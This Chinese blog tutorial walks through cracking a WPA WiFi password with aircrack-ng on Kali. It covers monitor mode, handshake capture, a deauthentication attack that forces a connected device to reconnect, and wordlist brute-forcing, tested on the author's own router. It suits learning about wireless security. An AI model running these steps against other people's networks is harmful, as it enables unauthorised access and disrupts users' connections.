admin管理员组

文章数量:1620382

 

环境准备:Kali Linux 4.14.0-kali3-amd64

使用工具:aircrack-ng

参考视频:www.youtube/watch?v=F16ZvezC-kU

文章内容打开链接 https://freeerror/d/161

 

下面开始操作:

  1. 准备一张无线网卡,博主使用的是TP-LINK,型号TL-WN725N(任何网卡都可以啦)。插入网卡,在虚拟机界面右击,按照下图所示,点击连接,将无线网卡连接在kali上

 

    2.使用 iwconfig 查看无线网卡名称和状态

可以看到此时网卡名称是wlan0,模式是managed模式

    3.开启网卡监听模式

我们先使用 airmon-ng check kill  来列出影响监听模式的进程,并使用kill 命令终止相关进程

然后我们启动网卡监听模式    airmon-ng start wlan0 。执行完命令后我们看到我们网卡的名字由“wlan0”变成了“wlan0mon”,他表示我们的网卡已经成功处于监听模式。(注意:网卡名称偶尔也不会变)

    4. 抓取附近流量包,我们会用蓝框中我的的AP进行测试

airodump-ng wlan0mon

 

 

下面解释一下信息:

BSSID:AP的MAC地址

PWR:信号强度,绝对值越小信号强度越高

Data:路由器的在线数据吞吐量,数字越大,数据上传量越大

CH:通道

MB:传输的最大比特率

ENC:加密方式

ESSID:Wifi名称

    5.抓取握手包

airodump-ng -c 1 -w wifi-pass --bssid 30:FC:68:05:0A:1A    wlan0mon

-c:通道,就是上面图中的 CH

-w:握手包保存到的文件名字(我的文件名字就是 wifi-pass)

--bssid:AP的MAC地址

然后回车就出现下图啦:

station表示的就是当前连接WiFi的设备的MAC地址,可以看到当前有两个设备连着我的网络。

    6. 发送攻击数据包使得用户重新连接WiFi

这时我们可以等新用户使用密码连接,但时间是很宝贵的,所以我们要做的就是强制某个已连接的电脑断开WIFI并且重新连接(PS. 基本上无法察觉,只是会断网几秒钟)

aireplay-ng -0 20 -a 30:FC:68:05:0A:1A -c 88:B1:11:0A:05:C8 wlan0mon

成功后会显示:

此时查看工作目录下会发现多了很多文件:

至此可以关闭网卡的监听模式:

airmon-ng stop wlan0mon

    7.破解密码

破解密码采用的是暴力破解方法。这里为了节省时间,我将自己wifi密码写入了一个txt文档中,命名“mima.txt”,保证最快速的找到密码。此时当前路径下的文件如下:

当然,kali自带有密码本,在/usr/share/wordlists/rockyou.txt 下。

使用命令开始破解:

aircrack-ng -w mima.txt wifi-pass-01.cap

其中-w 后面是密码本的路径,再后面是捕获的数据包,破解密码要使用.cap文件。

破解完成后就会显示:

因为我的密码本里只有一个自己wifi的密码,所以只对比一次即可找到密码。密码如圈中所示。如果是一般情况的话,我们要采用标准密码本破解,除了kali自带的密码本之外,还可以去github上找。

8. 心得

本次实验做的比较粗糙,关于aricrack-ng命令详解可以参考https://blog.csdn/u011781521/article/details/69062209这位老哥的博客。总之纸上得来终觉浅,一次简单的实验也是崎岖不易,重点还是得看我们能从实验中学到些什么,

本文标签: 密码NGaircrackwifiLinux